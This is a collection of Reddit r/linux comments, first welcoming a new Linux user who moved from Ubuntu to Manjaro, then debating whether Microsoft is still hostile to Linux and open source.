Now, only a few years since, my initial interest in system administration has led me to the mystery of how programs are made in the first place. Ultimately, I quit my job (to go have fun and do some dumb shit first lol) to now study to become a web developer. 

And it’s all because of linux. Had I not taken the dive I never would’ve discovered my interest for any of this. This software and this community are amazing and have changed many lives for the better. I love linux. Glad to have you with us!!
Nice, Manjaro is a really good choice. Arch (or Arch-based) distros FTW!
There's a great copypasta that resumes your experience

https://i.imgur.com/jqIcv.jpg

And let me tell you, as someone who's been using Linux for ~15 years the fun has just begun. The level of customization you can achieve is simply mind boggling, and the more you know the more you realize the vast amount of what is possible. A great example is my new laptop that has two GPUs, I've made it so that when I turn on my PC I choose which one to use, either the Intel for long battery life, or the Nvidia for gaming, and I do that in a pretty GUI where the boot selection screen has the logos for Intel and Nvidia to choose from. And I'm now working on underclocking my GPU when on battery because it pulls more energy than what the battery is capable of giving, and when I find the right parameters I'll make it so that when I unplug the computer the GPU immediately underclocks to those set parameters, and when I plug it back on it goes back to normal.

Finally I have a recommendation for you since you like to tinker, go to /r/unixporn for ideas on how to make your DE look prettier. Good luck, and welcome :)
I needed to build a new computer for my mom and I really didn't feel like pirating a copy of Windows again. So I put Ubuntu on it, set it up and told my mom that we're going with linux and that's that. 

At first she hated the new os but was able to use it nonetheless.

Eventually she told me that Ubuntu was very intuitive, she was able to trouble shoot issues by herself and solve problems using basic computer skills. 

About three years later of using Ubuntu she decided she wanted a new laptop which she bought, it came with Windows 10 of course. After using Windows for just a few weeks she's asking me if we can out Ubuntu on it because windows 10 sucks ass. 

So there you have it, my mother of 52 learned to use Ubuntu pretty much by herself and now prefers it... This is a testament to how great Linux really is.
A little tip while you're learning: backup your files often, it can be pretty easy to ruin your installation while learning different commands. (Accidentally recursively deleted my root directory once...)
Manjaro huh! How you doin!
You just described me about 3 years ago. Mine was a bit of a forced situation but I'm so glad it happened.
If you have trouble with Windows 10 and absolutely have to use it, maybe I can help you. I however want you to look for FOSS alternatives since there are plenty and I have done the same thing. Good luck and have fun with Linux, my friend.
I totally relate to what you said bit by bit. Even starting with Ubuntu and landing on Manjaro. The only difference is it took me maybe a year to get where you got in a month and probably 40 different distros. I have seen others too taking as long as me, sadly. I blamed Windows for making me learn the Windows way since I was a kid, which made it much more difficult for me to re-learn how a computer should be. I am really impressed on your learning curve though. Anyway cheers and welcome Linux!
Awesome.

Ubuntu is a gateway drug. Before you know it you'll be Arching (already on manjaro, check) and then you'll end up on Gentoo. Then, you'll start forming opinions about why Suse is better than Fedora... and it's all downhill from there :)
Old-timer here.

Why, back in the day, the big hurdles were manually setting up ppp (a protocol used for dial-up connections) and creating a working x configuration.  Oh, and Microsoft used to play these games where they made life living hell for people who developed websites and people who tried to use any other Operating System but theirs.    Glad they finally outgrew that crap.  

Linux is pretty easy-mode now.  :)
Hey did you get Ur WiFi working with Manjaro? I've been using mint for a while now and wanted to try out Manjaro but in live usb I couldn't get the WiFi working. It's a hp laptop with Broadcom BCM adapter. A couple forums said it's a lost cause.
now go further by looking at some basics

1. [https://linuxjourney.com/](https://linuxjourney.com/)  \- learn basics about how everything fits together
2. [https://www.cloudflare.com/learning/ssl/what-is-ssl/](https://www.cloudflare.com/learning/ssl/what-is-ssl/) \- tls/https wtf are these?
3. [https://overthewire.org/wargames/bandit/](https://overthewire.org/wargames/bandit/) \- next level stuff, connect to a remote server and do stuff safely on it, like a game but the purpose is to get more familiar(and also feel like a hacker)

order does not matter, just read some of them and practice a bit. Also everything on the cloudflare is just useful knowledge
That's why the quote on https://distrowatch.com/
Says it right: put the fun back into computing.
You've managed to overcome Linux's main hurtle for the uninitiated: troubleshooting your own operating system. IMHO once you overcome this barrier, there's really no turning back. Package Management GUIs have turned Linux into a breeze these days(I still remember having to mess with tarballs for extra software)! What always brings a smile to my face about Linux, and the community, is the appreciation of hardware. You don't need new hardware to have a powerful/fast machine. I just finally got rid of an HP Mini netbook that was rocking Gentoo still till the monitor inside of it finally crapped out. That thing was bought, refurbished, over 10 years ago for around $100USD. For years it ran Linux Mint and outlived my 2009 MacBook Pro. I finally switched to Gentoo when it became clear that having 1GB of RAM was seriously limiting and Gentoo delivered on giving it new life. It didn't live long afterwards mknhd you but the fact it was still trucking after so long still blows my mind. 

The fact you've jumped from Ubuntu to Manjaro in a month is a clear sign you are home :) Not too many jump from one end to the other in such a short time. 
Welcome to the community!
I've had this exact feeling, I started using Linux over a month ago as well. I've gotten so used to it in fact that I keep hitting ctrl+alt+t in Windows expecting to get the terminal...
I don't want to sound like a douche, but after I dropped Mandrake back in the late 90s I've tried several times Linux and is just not for me. I find it kinda ugly. I use macOS and W10 all day long and have a pletora of headless servers for a miriad of things (that's my job). I couldn't survive without GNU/Linux but as graphical interface goes, I never got hooked (specially Ubuntu).

For years I've been using mostly Alpine (for musl), CentOS, Arch and Crux. Anyway is been like 10ish years since I tried the last time a full-blown OS instead of only headless, is there anything new around that doesn't look "clunky" (like Gnome or KDE) or half-backed (XFE)? I've looked Plasma, MATE, Cinnamon, LXDE... all seem like the designer never finish them.

I really want to dich Windows, I mean... I can setup a VM in my Mac if needed, but if there's nothing worth to look at, I might keep it and wait for LSB2  :(
I started with Kubuntu 8.04(so around 2008), a friend introduced me into this wholesome, new universe. I don't even know how to Windows anymore. The last time my mom needed help on her PC, i couldn't find anything and at least two times i was like... Dang, i need a terminal and that problem is solved within 1min!
Hell yeah! Welcome to the boat, son. :)

>manjaro

Oh boy...
Give yourself to the dark side!
That's how I felt when I first installed Linux. But after a few days of trying to get my laptops graphics card to work I just gave up :(
Linux since 1999 - wtf is a fossa? - who cares, i'm glad you found it. Never look back, but always keep exploring. 

  
  
  
*edit *   
Seriously, [wtf is this](https://docs.fossa.com/docs/importing-a-project)
Good for you :) welcome to the family.
As someone who grew up on linux (suse) I've always found windows uncomfortable, and every time you have a problem there's not 6 different forums discussing your niche problem, be it on 5 different distros, but when it's something as fundamental as a driver issue the solution usually works across the distributions, and downloading software from just anywhere is strange, I know that the developers website is usually a good source, but it still feels wierd.
>  Redmond WA were collecting every bit of my data they could

That is true problem. But you should also do DNS level blocking of ads and tracking web servers by starting to use pi-hole too.

Remember: when company offers free service, it is you who is the product they are selling.

Carry on sir.
welcome on board)
Welcome to the dark side! I actually had a similar experience yesterday when I transitioned from Ubuntu to Arch. In general, less handholding and more time using the terminal helps you learn new things about how your computer works!
Good to read your story. Many people throw their hands up in defeat at the first sign of difficulty.

P.s. use Arch... eventually.
Welcome home. While I played with Linux as a teen, I didn’t start using it regularly until my twenties. It’s amazing to see how forward-thinking Linux is. I remember getting quite a laugh at Windows 8 with their strange Metro UI/spartan regular desktop hybrid monstrosity; 1 year after GNOME 3.
>Everyone's willing to help you solve a problem, and everyone is just as passionate about it as you are.

eh... kind of. I usually find my questions unanswered. Even when I go on IRC, people don't know.

For most regular stuff, someone has already asked and I can just go off their posts. On the rest I get it figured out in a few hours about 75% of the time and end up answering my own post.
I'm extremely happy with Linux on every laptop I've tried in the last few years.

However, windows 7 and 10, especially despite significant annoyances, virtually never crash at all for me.  Or any system I've used except ones with faulty hardware.
I did the same back in July 15 2003. Never look back towards Windows. Last Windows I touch was Windows XP, before my switch. 5 days I was comfortable using Linux. 17 years later and still using Linux. Current Linux distro is MX Xfce Debian Stable(Buster). Welcome to the Linux community.
I Remember installing red hat Linux from a CD that came with a book,  totally erased all my family data and could not re-partition since I had no clue what I was doing.  

Spent the next few hours installing windows from 2am to 9am before my family woke up.  

My family was amazed how fast the computer became and asked me if I did anything to make it faster..... I played dumb, and then 15 years later Ubuntu came along and never went back other than installing windows on virtual box to get rocksmith on steam working properly :/ 

Mate is the most stable distribution I have come across so far.
Similar experience.  Dual booted Ubuntu on and off for years, never really understand how Linux works.  Until one day when I made the decision to fully switch into Arch, its a whole new world.  Feels like I really own the computer now, a feel that Microsoft never wanted you to have.
Damn, it’s really hard to know if this is satire or not. Bravo.
Welcome to the team, my friend.

I switched over to Linux Mint Cin last year (distro with mainly Ubuntu under the hood, but windowsy-looking), and I've not regretted it a day.  

I've been able to run 99% of games and windows apps using wine and proton, and have a separate Windows 10 install running off a thumb drive that I can just pop onto for the rare stubborn holdout.  

Computing has been a refreshing experience over the last year.  The only thing I'm mad about is that I didn't make the switch sooner.
Why did you choose Manjaro over, say, Ubuntu? Just curious.
I've also made the switch from Windows 10 to Linux Mint. I can definitely tell that Linux is so much smoother than Windows and it also has more customization options =D
Been using GNU/Linux for over 20 years I have never once heard the term "focal fossa" till now.
Wow in a month you've gone from Ubuntu to Manjaro. You've hit this waaaay faster than I've. It's been \~8 years now and I still lack the guts to go onto a rolling distro. XD
1.4k upvotes, 0 comments.  


nice
Manjaro has been my favorite for a while. I recommend KDE if you can handle a heavier desktop environment, but Manjaro as a whole is great because of how many options there are. I felt the same as you when I first switched.
I went into Linux with an old machine and some spare time before my final exams. I remember it like it was yesterday. I remember seeing the lubuntu splash screen on my 15 year old computer and thinking wow this is something different for once. I miss that feeling. It's been a year now and I still have no regrets. I dived in head first on my about 6 months ago. It did not go well (none of the Ubuntu upgrades have gone well on my laptop) but I am loving my computer more and more everyday ( I wish I could say the same about a girlfriend but that's another story..)
Linux user for 26 years now. Unix before that. Welcome to the club!
>I started really enjoying using my computer again, like how you felt after learning on your first one. 

And this is really the only problem with linux.  I see youve already hopped to a different distro.  People get addicted to it and  keep installing a new one every couple months.  

It really is nice to have community support and the ability to fix a problem yourself if you want to learn how to code.  You wont be able to do that with mac or windows no matter how much coding you know, they just wont let you do it.
Strange - I usually have the opposite reaction. I like solving puzzles, but not driver puzzles or spending an hour trying to figure out how to get software updated on Linux. I have enough actual coding problems to solve.
Protip: Use a separate drive or partition mounted at /home. That way you can distro-hop without nuking your user data every time you install a new distro. I still do this even though I'm pretty settled here on openSUSE because it maintains my settings when I move to the newest version of Leap. Saves a ton of time.
Go Fedora Silverblue!
Bullshit.
Linux users spend more time patting themselves on the back than accomplishing anything of value. Just like this thread which appear every day in some fashion.
Manjaro's XFCE version is second to none. It's a great daily driver!
The cool thing about linux is that the system is accessible. It isn't completely hidden behind layers and layers of abstraction, per say. You don't have to relay on special tools that do something tricky. You can access everything right from the command line. For instance, you can get hardware info by catting something in /dev, such as your battery. Stuff that would require a tricky-ass 3rd party program in windows.

Honestly though, I like the utilities most of all.
I've been using Linux for almost 5yrs now, don't regret a thing.
Welcome aboard!

I think the most disappointing thing is the default graphical interface Ubuntu comes with (Gnome 3), which is too bare and too far away  from anything that a user has used before.

Xfce is nice along with MATE, Cinnamon and my persona favorite, KDE Plasma.
Be careful  out there though, you may end up running across the toxic part of the community, as well. If so, just nope out of that and do not go back because, what you do with your computer and how is none of their business. I count myself blessed and fortunate because, I have never lost interest in computing regardless of the OS I am using.  

Yes, I consider the best OSes to be in the past, OS/2 Warp and the Amiga. That said, I have been hooked on this stuff for at least 30 years and have not lost interest yet.
I like to think of GNU/Linux as a Lego robot.
I remember when I first started trying out Ubuntu, their forum was full of assholes and I got banned for posting "fuck this, I am going back to a real OS".

Little did they know I meant Debian that I was going back to.
I've been trying to install wifi drivers for 9 years, now I just switch to distros that have it preconfigured.  (AntiX BunsenLabs LXLE Puppy and Sparky for anyone listening)
Have you tried wine/proton lutris  dxvk for gaming
Once you switch you never go back :)
As expected here, lots of offerings from Linux fans.  Linux still is not mature enough for the general desktop & mobile population.  Microsoft & Apple still rules there.

Like most here, I have high hopes & good wishes for Linux.  If Linux can "grow up", there is no need for the other operating systems.  But can Linux ever attract millions of third party coders?  Will these coders use appimage, Snap or Flatpak?

Then there are many other unresolved issues: QT & GTK visual differences.   RPM applications are incompatible with so many operating systems based on the RPM  foundation.  The DEB applications are much better on most , but not all DEB based operating systems.

X display sort of works, so Wayland is in rapid development.  HiDPI and other hardware advances are confusing to all operating systems.  Game players & others on the latest, greatest desktop technology prefer Windows, for the moments.  Linux is a distant third placer.
Will the all the "nice" PR and news of Microsoft (seemingly) getting close to Linux, it's easy to forget how Microsoft IS hostile to Linux and everything open source. Remember: All they did was get a new CEO, the company culture is still there.

All that's changed is instead of publicly hating on Linux, they now publicly love Linux, but are really still very hostile to Linux. This will never change.

Just remember the Iowa consumer case files ( http://edge-op.org/iowa/www.iowaconsumercase.org/ ) which has a lot of internal emails from Microsoft, many of them basically state their love for all things Windows and MS and hatrid for everything else. All are in PDF format and have been unsealed (thankfully). Some even go into detail about their plotting with things like the Vista Ready program in order to trick consumers (they basically don't give a shit) etc.

Then there's Halloween docs:
http://www.catb.org/esr/halloween/

Again, take your pick - Get The FUD, whatever you choose. It's all there. Then there's Ballmer's "Linux is cancer" etc.

Yeah, yeah sure, I'm off my rocker, this was all years ago etc. But it's not - Microsoft HATES Linux, this will NEVER change! Again, the only thing that has change is the CEO and as a result, the PR. You'll probably find that Nadella has internally said to everyone "publicly, we LOVE Linux and FLOSS, internally it's still business as usual"; and changed the PR machine as a result.

Now I don't know what Shuttleworth and Canonical are playing at or what benefit they may get from the deal they made, perhaps more Ubuntu market share (and money). But don't let your guard down - Microsoft will ALWAYS hate Linux, even if you can't directly see it.

Do you really think Bill Gates, while no longer chairman or CEO (he still works there tho), would *really* let his company, his ways, his wants and direction etc all go down the toilet and have someone else come in and take it all in a new direction? No... Gates is very smart and ruthless. MUCH smarter than that. His / the "old Microsoft" dirty business ways are fully entrenched in the company. No single change of CEO will fix the ways of the "old Microsoft".

The "old Microsoft" is still the "new Microsoft", only the face of the company has changed - CEO and PR. That's it. Microsoft, if they could, would press a button and kill Linux and FLOSS over night.

Remember the "patents" they have that they will use to threaten our ways, even if not directly. Microsoft will always be hostile to Linux and free software. Remember that!

**EDIT**: Wow, so many replies! And GOLD, thank you, kind sir / mam. Yes, the links are old, but so what - who is funding SCO (MS probably), the Android extortion etc etc etc, it all still goes on...
I don't think Ubuntu in Windows 10 should be perceived as Microsoft doing something positive for Linux. Really, the main benefit of that is ability to use Windows 10 where in the past it was necessary to boot into Linux or use a Linux VM. It makes Windows 10 better, and it doesn't make Linux better.
Microsoft has unquestionably been hostile towards Linux in the past, but producing documents from 2007 and 1998 respectively as evidence that in 2016 Microsoft is *still* hostile toward Linux is not a good argument.


I'm only excited because I will no longer have to curse and spit when trying to do anything remotely technical on Windows.
I don't trust this new Microsoft either but you come off as paranoid and borderline insane. Your argumenting is just drivel that leads no where. It just comes down to your gut feeling how Microsoft will always hate Linux to the ends of time.
Actions speak louder than words. They may do all the PR they want, but here is why I don't trust them:

1. Microsoft deliberately keeps their Excel and Word document formats (xlsx & docx) incompatible with ODF which is the open standard. As a result, you cannot just create a document in LibreOffice and send it to your buddy using MSOffice and hope it will work as it is. Microsoft has ensured that it won't to the detriment of Linux.

2. They keep ignoring Skype on Linux. TBH, Skype and MSOffice are currently their only strength and together they make up about 90% of reason the desktop users are sticking with Windows. By making Skype unavailable on Linux, MS seems to be making a desperate attempt to keep their users from switching to Linux.

3. They keep funding things like the SCO lawsuit behind the scenes, which is very hypocritical of them considering their motto is *Microsoft loves Linux*.

4. They keep adding adware/spyware to their kernel and forcefully update their users' machine. This pertains to basic ethics and you don't need a technical person to tell you how this is wrong.
The whole "Microsoft <3 Linux" thing is because they need it for their cloud.  A lot of companies need to be able to run Linux, if your cloud-provider doesn't offer it, you're in trouble.  I don't think this needs to be made complicated.  If Microsoft makes a move that seems *somewhat* charitable, ask yourself if it benefits Azure adoption.  For me at least, that has been enough to explain most of their recent positive PR.
Oh come on. Microsoft isn't one person. This change has been happening internally for a long time as their teams push more and more for open source. They've open sourced tons of their own software stacks in additon to embracing node and Linux more. It's not some evil scheme, it's every day life for a giant corporate culture and it takes time for them to change. Give this paranoid BS a rest. If they make more stupid decisions then I'll happily call them out on it but until then I'm enjoying the new direction they are taking.
What does Microsoft have to do with being a Linux user ? I never understood what one had to do with other.
I'm a Windows Sysadmin and I see nothing changing in the belly of what Microsoft does. Prices are still rising on an accelerating treadmill and licensing is still labyrinthine at times. 

They're saying the right things and making the right noises but I would still be extremely wary of embracing them too much if I was a die-hard FLOSS advocate. They didn't get to where they are by selling sunshine, cuddles and kisses.
Microsoft doesn't love or hate anything besides loving money and hating losing money. 
* --- Views expressed below are my own, not my employer's --- *

First thing: I understand your views, but I do have to say that I think you're living too far in the past.

Microsoft doesn't hate Linux. Far from it. Many of us love Linux, especially for server-side scenarios. Many of us have used and/or worked-on Unix and Linux at many stages of our careers. And MANY of us work on and contribute to a variety of open-source projects too, in both our professional and personal time.

I, for example, used to work at Microsoft from 2000-2010. I've spent the last 6 years in "the real world" building startups and helping build & run media streaming services and apps using open-source tools and platforms. 

I re-joined Microsoft just a few weeks ago specifically to help make the Windows command-Line cool again, and to help bring Bash on Ubuntu on Windows to life.

So, yes, I am a Microsoftie. And yes, I am a little biased, but no more so than you, and perhaps a little less so! I for example, am firmly rooted in the real world and judge based on long-term behaviors tempered by change over time. When the parties involved change dramatically, I re-assess an organization's behavior anew.

The Microsoft you describe doesn't exist. The leaders you talk about are no longer at the company. The leadership you think used to exist, DEFINITELY isn't around today. You seriously think Gates is some behind the scenes arch villian stroking his pussy cat, dropping morsels into the tank with the sharks with lasers on their heads? Seriously?? If so, you should go tell the SEC!

Microsoft has made enormous strides over the last few years from suporting jQuery, to open-sourcing ASP.NET. From open-sourcing Roslyn, CLR, .NET Framework, to buying Xamarin and open-sourcing all their frameworks and relicensing Mono as MIT. Heck, they even open-sourced their Hyper-V Linux drivers & contributed to the Linux kernel. We also added the ability to natively build and debug Linux applications to Visual Studio, and have open-sourced Visual Studio Code! We've even ported SQL Server to run on Linux, and last week announced Bash on Ubuntu on Windows, which brings us back to your comments.

I think it's fair to say that Microsoft has made some HUGE changes extraordinarily quickly for a collossal organization with the history it's had in this space. There's still much to do, but I think it fair to say that perhaps its worth re-assessing today's reality, especially considering the issues you raise were from 10+ years ago. In a different era, when the company had very different leadership, and a totally different culture.

Today, Microsoft is proving its viewpoints through its actions. It's openly supporting and contributing to open-source projects. It's open-sourcing many of its own key assets and working in an open-development model with the community to improve those products helping them run across many platforms. It's offering its products on alternate platforms. Its cloud platform openly supports running Linux VM's, code written in Ruby, Python, Java, R, Go Lang, node/JS, etc. Its browsers are now among the most standards-compliant. It's C++ compiler is being massively overhauled to support more standardized C++. Etc.

The company you despise so much genuinely doesn't exist. Microsoft today is a very different entity than the Microsoft of old. There are no evil meetings where we plan evil schemes to tear down the world and take over. Frankly, Microsoft simply isn't organized enough to be as evil as you want us to be. Heck, we're only just organized enough to be able to design, build, and ship the products we DO offer!
hang on. are you suggesting that microsoft is "hostile" to a competing business/computing model??  wow, blowing the lid off this shit.
Microsoft is currently in the "bargaining" stage of grief for their lost Windows monopoly.  That's all.
All this says to me is "Microsoft is evil. I don't like them"
I don't think it's useful to talk about Microsoft as a monolithic entity and attempt to ascribe it emotions and opinions. Microsoft is a company, and individuals within it have a wide variety of opinions. It's reductionist to the point of misleading and really doesn't help anything. *Microsoft* doesn't hate or love or anything in between, and while there is definitely a culture to the company, each individual has their own attitudes.

HOWEVER, Microsoft as a *business entity* does have a vested interest in seeing their de-facto monopoly on the desktop OS market maintained. Microsoft makes a lot of money based on its status as the standard business and consumer operating system. The company leadership even arguably has a fiduciary responsibility to do whatever it can to maintain that highly profitable status on behalf of shareholders. If that means acting in a hostile manner to the only major threat to that position, the company will do so. If at some point it becomes economically advantageous to support FLOSS, you can bet your ass that MS will turn on a dime and do so.
You're making all the same mistakes people make when they say "Reddit is this" or "Reddit is that". Microsoft is not a single entity representing a single thought. There are some people inside Microsoft that are still very Windows heavy and thing Windows is the best thing for all things ever. There's however a growing movement within the company to use the best tool for the job, and honestly linux tends to be better at a lot of things. So yes there will still be negative things coming out of Microsoft towards the linux and open source worlds but there will also increasingly be more positive stuff.
I don't think it's particularly useful to talk about simple *hatred* of Linux, as if it's a form of nationalistic prejudice or something. Instead maybe we should ask what MS' corporate objectives are, and whether harming FOSS projects could benefit them. Microsoft isn't a cartoon villain, despite what Linux evangelists (or Steve Ballmer) would have you believe. It's a company, and every decision it makes is intended to be pragmatic and, ultimately, profitable.
I agree with you, in that MS shouldn't be trusted and to not forget their roots, but not for the same reasons. I think company culture and ideals can change over time. The culture will change in the company as they hire and actively work on linux, how can you hate it and do it all day, it probably won't remain that way. Plus a lot of devs for windows get frustrated and annoyed with windows for dev type reasons all the time. I have read several windows devs complaints about chaning certain archaic pieces.


In any case, I think, what is really important to not forget, is that MS is a ruthless business competitor and publicly traded company with stock holders to answer to. I think they try to make a lot of this work look charitable and I just don't buy it, at least yet. It does seem hard to believe, and MS wouldn't usually put a lot of work down on integration without some sort of end game. 


Perhaps their end game is a version of linux that competes with red hat. They start building tools, windows integration, etc (even MSSQL!) and suddenly you need to support it. Tailor a version that ships with your tools and suddenly you're competing with red hat and they won't be able to compete back. That is my fear :(
They also still like to pretend that they can go around suing Android OEMs.
The question, in my mind, is what does Canonical get out of this deal?

Microsoft gets tools that helps developers that use Windows. That's good for Microsoft, and good for Microsoft developers.

But it's not, as far as I can tell, good for Canonical. So, why are they doing it?
Microsoft has donated more financially to open source and contributed more open source code then the majority of "haters" in this thread would ever do in their life.

So while some here are contributing lame conspiracy theories, Microsoft is actively contributing to Linux along with making donations to OpenBSD and the like.
Sounds like a little dementia and paranoia lol. They will always be out to get us!

Why speak in absolutes when you have no idea the mindset where they are coming from? 

"Microsoft HATES Linux, this will NEVER change!"

Why not give a nod to the people at Microsoft that are beginning to understand that they are bleeding developers to other platforms and are doing what they can to cater to them.
It's like the phrase "greedy corporation" is redundant. They're greedy by nature.
[deleted]
Pry my linux laptop from my cold dead hands.
In all honesty I dont remember seeing anywhere anyone agreeing or saying "Microsoft loves Linux". Is Microsoft saying it? Ya sure, probably to recoup the person they lost from Windows to Mac because of shitty development tools but anyone that knows anything  knows that Microsoft is a business and a business is in business to make money. Nobody "loves" anything when its always just about the $$$
RemindMe! 1 year
> it's easy to forget

No. It's not. It really isn't. There's enough people around constantly shouting annoying slogans to see to that.
[deleted]
1. Dot Net runs on Linux
2. Developers start using Linux to make dot net apps and websites
3. Microsoft makes "Ubuntu + Windows"
4. Microsoft cuts dot net for Linux
5. Developers move back to Windows, because it has dot net, and it now has bash, so it doesn't break their workflow.
What blows my mind is that nobody seems to remember that Gates & his cronies attempted to undermine the development of the internet, and succeeded for a pretty long time. Mid '90s. Internet exploding in popularity. Windows 95, but is not at all equipped with internet functionality - 'it's just this hype among college students and nerds'. Proven wrong, they hastily release Win95r2 with a rebranded Mosaic browser fully built-in and give it the most generic possible name - Internet Explorer. Bam, the internet browsing public switches overnight to this new browser, because it's built-in. Market share soars into the high 90's. So, what do they do next? Absolutely nothing. Netscape had died, and so did the open standards it advocated. Microsoft had effectively embraced, extended and extinguished the internet. 
I don't disagree, but why bring up a bunch of dated evidence, admit it's dated, but then still write a post using that as the "backup"  to your claims, when it's admittedly(by yourself)  dated? 
This is the biggest circlejerk on /r/linux I've seen in a while.
Let me play devil's advocate here just a little bit. I'm relatively recently out of college, and one thing Microsoft may be doing unintentionally with this PR (because I agree with you for the most part that this is business as usual + PR, or is intended to be from higher up) is that Microsoft's recruits are starting to be people who are friendly to FOSS and love it/used it growing up, etc. These young engineers are having an effect on the culture within, and are part of the reason we're seeing random projects unrelated to Linux open source. The company does it to retain FOSS-friendly developers who would have otherwise flown the coop for a start-up to pay the bills a few years after college. It is causing a possibly-unintentional sea change there.

That being said I'm still incredibly skeptical of them, their software is still sub par and awful to use, and shit like advertising on the desktop on Windows 8 for Windows 10, Cortana, etc, is obviously business as usual. But there is a chance that upper management might wind up with a cultural shift in house that's more severe and closer to the PR than they intended when they started up this latest round of embrace, extend, extinguish, and at the very least it will be interesting to watch as the desktop era winds down
What's the first part of the 3 E's of Microsoft's philosophy? Isn't anyone else highly suspicious of how "close" they're getting to Linux? Seriously.
It's just business. At the end of the day there isn't some secret plot to kill off FOSS and have Windows reign supreme, instead it's simply just all about money. All they are doing is they have realised some way of making more money and they are doing it. It's no different than Apple outsourcing all their labour to Asia where it's much cheaper, they aren't doing it to be evil, it's just business.


I think the reason that us FOSS people don't like what we see when companies do stuff like this is because what we do is out of love, not a pursuit of profit.
This seems like it was written by a teenager who did no research. I have no vested interest. But I worked as a software developer using Microsoft technologies. i was one of the minority of .NET developers who also did open source. But for years before their new CEO, they had been building up towards embracing open source. It really has been a movement within the company. Most of the developers like to use Linux. Microsoft started working more with open source tools for their developer technologies, they open sourced ASP.NET MVC and ASP.NET a few years *before* their new CEO came in. 

I believe Nadella came from the division that owned ASP.NET. After ASP.NET they open sourced their C# compiler. Along with these moves they started embracing community accepted open source tech, like twitter bootstrap, they open sourced TypeScript, their compile-to-javascript superset of javascript. There is a ton more they did, and there is a logical and easy to follow build up to all of this that goes back to years before Nadella. It was all happening under Scott Gu's team, and I believe Gu is now head of the Azure division, but he was head of ASP.NET before that, which is now a part of the Azure division. 

I think I am correct in saying that Nadella came from what is now known as the Azure division, which is where all their embracing of open source started, but even if I have that part wrong, it doesn't matter. Because the OP is just flat out wrong. Microsoft didn't simply change CEO's, t his isn't just some fly by night decision that they came up with last night. 

This is something they have been working towards for years, and move of the developers within Microsoft really love the shift towards open source. They both develop many of their technologies as open source, as well as make use of and integrate with third party community created open source projects. 

I'm sure there may be some truthful parts to the OP, but as a developer who has worked with Microsoft development technologies for the past few years (ironically, I recently stopped to focus more on non-Microsoft stacks because I felt the job pool for MS stuff was too limiting), I can tell you that OP is flat out making some of this stuff up. He has done no research. It's all just conjecture. 
Its pretty obvious microsoft is using the "[embrace, expand, and extinguish](https://en.wikipedia.org/wiki/Embrace,_extend_and_extinguish)" strategy on canonical to try and slow down ubuntu's adoption rate while microsoft makes their own linux distro that will destroy ubuntu after canonical wastes a year or two of their time trying to make ubuntu compatible with windows.

Ubuntu must have been really hurting to accept an "embrace, expand, and extinguish" deal from microsoft. 

This isnt microsoft's first rodeo. 
This is pretty much bullshit. Yes, they will continue to be hostile to Linux insofar they're perceiving Linux as a threat to their profits. They will support Linux if they perceive that as benificial for their profits.

Microsoft offers many products that are competing with FOSS solutions, and they will continue to try to maintain these products dominance on the market. But they're not some evil cult out to destroy FOSS just for the sake of it.
I dont think the it is a PR move to get Linux applications to run on windows. I have thought years ago that MS should have done this to get a bite out of the linux market. It is a slippery slope when you get involved in a foss application. an sysadmin who is accustomed to windows and knows nothing about linux will one day have to deploy an application that only runs on linux . He will start to learn about linux and find he can use it for other quick things that dont require a proposal, req, and PO to purchase some software. he can just slap it on a box that is sitting in the decommissioned pile. This makes him learn more about linux and it goes on. If the linux applications ran on linux the admin would not have left his comfort zone of windows.   I thinking they tried to do this with the [Subsystem for UNIX-based Applications](https://en.wikipedia.org/wiki/Windows_Services_for_UNIX#SUA_and_separate_NFS) . Now it seems too little too late.

Kind today, hostile tomorrow, if necessary. That's unfortunately a normal behaviour for a corporation.

Engineers and many others that work at MS are still people as you and me, trying to solve problems their colleagues or customers have and simply trying to make a living.

Another example: there are many sysadmins that can't use Linux at their daily job because of security policy and whatnot. Cygwin doesn't cut it for various reasons. So the latest development with MS+Ubuntu  would be a welcome change. Please, let's not try to forget that world is not black and white.
TL/DR Microsoft doesn’t like competition even if it says it does. 
Microsoft will do what benefits them, and generates money for them.

It is stupid to assume that they are looking to benefit linux in any way, they want to benefit themselves only. There is nothing paranoid about that. 
Microsoft is selling Linux VM's like crazy on Azure, why don't they love Linux, it is making them money.
Microsoft does a fair amount of OSS development. Even if you ignore the HyperV code in the Linux kernel, there's still .NET Core, ASP.NET, Entity Framework, and Visual Studio Code which are all OSS. There are probably others, but those are the OSS Microsoft projects I've used before.

That doesn't mean that they won't do whatever they can to claw back some of the server market for themselves - they are a corporation, their primary objective is profit. However, I suspect that their support for Linux on Azure and HyperV means that they've accepted that they cannot maintain their monopoly.
I mean, they did just make Xamarin Free AND Open Source... so that's nice.
I talked to an unnamed former Microsoft executive who now works for a not-for-profit software foundation a couple days ago about this.

Apparently all the changes that Microsoft is making now were designed and slated like 7 years ago and everyone was waiting for Steve Ballmer to leave so they could actually do it. There are apparently lots of people there who've known that Microsoft sucks for a while and that these kinds of changes were necessary, and they were being blocked out by the old establishment. New CEO doesn't suck and likes their ideas, so thing that should have happened a while ago are now all happening.
They are mostly harmless.  Linux (or something like it) will always exist now that we have the internets.  Microso~1 has suffered some pretty amazing defeats at the hands of *NIX (and better software in general) in the last decade.

While I do think it is a good idea to avoid them, I don't really pay them much attention anymore.  We are quickly approaching a world where they don't matter.
think we need to be wary of sabotage...   company with billions and zero ethics buys support and buys off people.

pretty sure some of the recent ubuntu moves were microsoft incited.  so many fall to greed.  
So, OP is shocked that companies seek ways to make best profit, which generally means being hostile to competition except when it can benefit themselves, but instead of actually saying this OP came up with a cartoon villain story.
>Do you really think Bill Gates, while no longer chairman or CEO (he still works there tho), would really let his company, his ways, his wants and direction etc all go down the toilet and have someone else come in and take it all in a new direction?

I agree that Microsoft is certainly still hostile towards GNU/Linux (and free software in general), but I don't think this is directly because of some freedom-hating ulcer in Bill Gates's heart. That might be the reason the company is the way it is today, but it's not because Bill Gates is a supervillain controlling Microsoft from the shadows in between philanthropic trips to the developing world.
This post is bad no matter what your opinions on Microsoft. The base of OPs argument is that Microsoft will never change without giving any evidence supporting it, only evidence that they were hostile to Linux in the past, which is well known by now. This post has hate and fear, but not a lot of content.
How did you get gold for posting two old articles and a bunch of angry words
[Embrace, Extend, Extinguish.](https://en.wikipedia.org/wiki/Embrace,_extend_and_extinguish).

Anyone who thinks microsoft is interested in anything but attempting to crush FOSS is a fool.
Agreed. Anyone who thinks MS isn't trying to "embrace and enhance"  open source out of existence is nuts.
The most relevant thing is their continued use of patents to threaten or extort Android platform sellers. So far, the other things mentioned pale in comparison.
